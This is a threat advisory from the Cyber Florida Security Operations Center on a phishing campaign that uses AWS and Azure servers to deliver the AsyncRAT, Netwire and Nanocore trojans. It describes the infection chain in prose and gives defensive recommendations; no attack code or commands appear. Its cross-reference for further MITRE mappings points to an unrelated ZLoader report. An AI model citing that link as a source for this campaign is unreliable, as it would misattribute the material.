I. Targeted Entities

  • Amazon Web Services
  • Azure Cloud Services

II. Introduction

Cybercriminals are taking advantage of Amazon Web Services (AWS) and Azure Cloud services to deliver a trio of remote access trojans (RATs), all aimed to collect sensitive information from select users. According to researchers at Cisco Talos, threat actors have been distributing variants of the malware known as AsyncRAT, Netwire, and Nanocore since October 2020, mainly to targets in Italy, Singapore, South Korea, Spain, and the United States.

III. Background Information

The attacks start with a phishing email containing a malicious .zip attachment, but the criminals also have a cloud-based trick that can be used: “the .zip archive files contain an ISO image with a malicious loader in the form of JavaScript a Windows batch file or Visual Basic script. When the initial script is executed on the victim’s machine, it connects to a download server to download the next stage, which can be hosted on an Azure Cloud-based Windows server or an AWS EC2 instance,” says Talos researchers.[1]

Researchers say that using cloud services to host the payloads is a decision made in order to avoid detection while cutting the costs of the campaign since the attackers don’t have to set up their own infrastructure. It also makes it more difficult for defenders to track down the attackers. The threat actor behind this campaign maintains a distributed infrastructure consisting of download servers, command-and-control servers (C2s), and malicious subdomains, researchers said.[2] The download servers are hosted on Microsoft Azure and AWS. These well-known cloud services are used because of the inherent trust the public has with the well-known companies to be secure. Network defenders may think that communications to an IP address owned by Microsoft or Amazon are innocent because of the multitude of benign communications they frequently see across multiple services.

Further, the main JavaScript downloader used in this campaign uses a four-layer, complex obfuscation technique in its script. Researchers say, “Each stage of the deobfuscation process results with the decryption methods for the subsequent stages to finally arrive at the actual malicious downloader method. The deobfuscation process is performed at each stage with every next stage generated as the result of the previous stage deobfuscation function.”[2] The batch script has an obfuscated command that runs PowerShell to download and run a payload from a download server on Azure cloud. Obfuscated VB downloaders execute a PowerShell command, which runs and connects to the download server running on AWS EC2.[2] To avoid detection, the attackers use the DuckDNS dynamic DNS service to change the domain names of the C2 hosts. Talos researchers found that the threat actors have registered several malicious subdomains using the service.[2]

The RATs used in this campaign include:

  • AsyncRAT: used to remotely monitor and control computers through a secure, encrypted connection to a C2 server. It also contains a keylogger, screen recorder, and a system configuration manager, which allows the attacker to steal confidential data from the victim’s machine
  • NetwireRAT: a known threat used by attackers to steal victims’ passwords, login credentials, and credit card data. It can also remotely execute the commands and collect file-system information
  • Nanocore: a 32-bit .Net portable executable, which was first seen in 2013. The version used in this campaign contains two plugins, called Client and SurveillanceEX. Client, and handles the communications with the C2 server, and SurveillanceEX captures video and audio, as well as monitoring remote desktop activity.[2]

Talos researchers suggest that organizations deploy comprehensive multi-layered security controls to detect similar threats and safeguard their assets. “Defenders should monitor traffic to their organization and implement robust rules around the script execution policies on their endpoints. It is even more important for organizations to improve email security to detect and mitigate malicious email messages, and break the infection chain as early as possible.”

Miclain Keffeler, an application security consultant at nVisium, noted that the rise in the adoption of cloud technologies has forced a shift in security. But this shift means that cloud providers should also ensure that their systems are secure, saying that it is important for malicious usage of their services to be halted immediately when found. “These kinds of attacks aren’t going anywhere, so it’s important that cloud providers like AWS and Microsoft Azure step in to develop more processes around the notification of malicious use cases — especially given the complex nature of the current threatscape.”[2]

IV. MITRE ATT&CK

  • T1005 – Data From Local System
    Threat actors can search through local system sources such as local databases to find sensitive data prior to exfiltration.
  • T1063 – Security Software Discovery
    Attackers can become aware of which configurations, software, and sensors that are currently running in a system.
  • T1555 – Credentials From Password Stores
    Can retrieve passwords from mail and messaging applications.
  • T1105 – Ingress Tool Transfer
    Payload set to download from C2 onto the compromised host.
  • T1059 – Command and Scripting Interpreter
    Opens remote command-line interface and executes commands used in JavaScript files.

For more MITRE ATT&CKs, please confer the MITRE ATT&CK table in the attached CPR report: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and anti-malware programs are scanning assets using up-to-date signatures.
  • Monitor Malware
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Implement Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Multi-layered Security Controls
    Creating a multi-layered security system entails that there are numerous components that shield multiple operational layers.
  • Enhance Email Security
    Increasing email security allows for the detection and mitigation of malicious emails.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/xlo3kyjeye6q44qk3jusm2n1xin9cf32

VII. References

(1) Raghuprasad, Chetan, and Vanja Svajcer. “Nanocore, Netwire and AsyncRAT Spreading Campaign Uses Public Cloud Infrastructure.” Cisco Talos Intelligence Group, January 12, 2022. https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html.

(2) Seals, Tara. “Amazon, Azure Clouds Host Rat-Ty Trio in Info-Stealing Campaign.” Threatpost English Global, January 12, 2022. https://threatpost.com/amazon-azure-clouds-rat-infostealing/177606/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.